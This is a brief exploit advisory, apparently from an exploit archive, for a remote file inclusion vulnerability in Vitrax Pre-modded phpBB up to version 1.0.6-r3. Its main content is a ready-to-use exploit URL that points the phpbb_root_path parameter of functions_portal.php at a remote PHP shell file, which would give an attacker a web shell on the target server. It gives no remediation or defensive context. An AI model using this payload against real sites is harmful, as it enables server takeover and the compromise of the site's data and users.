id: 822
date: 09/11/2006
title: Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability
author: CeNGiZ-HaN
cves: 

===============================================================
Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability 
===============================================================


credits: CeNGiZ-HaN
risk: High
script: vitrax premodded phpbb


Exploit:

http://[target]/[path]/includes/functions_portal.php?phpbb_root_path=phpshell.txt?


GreeTz  No One =)



#  0day.today [2023-03-26]  #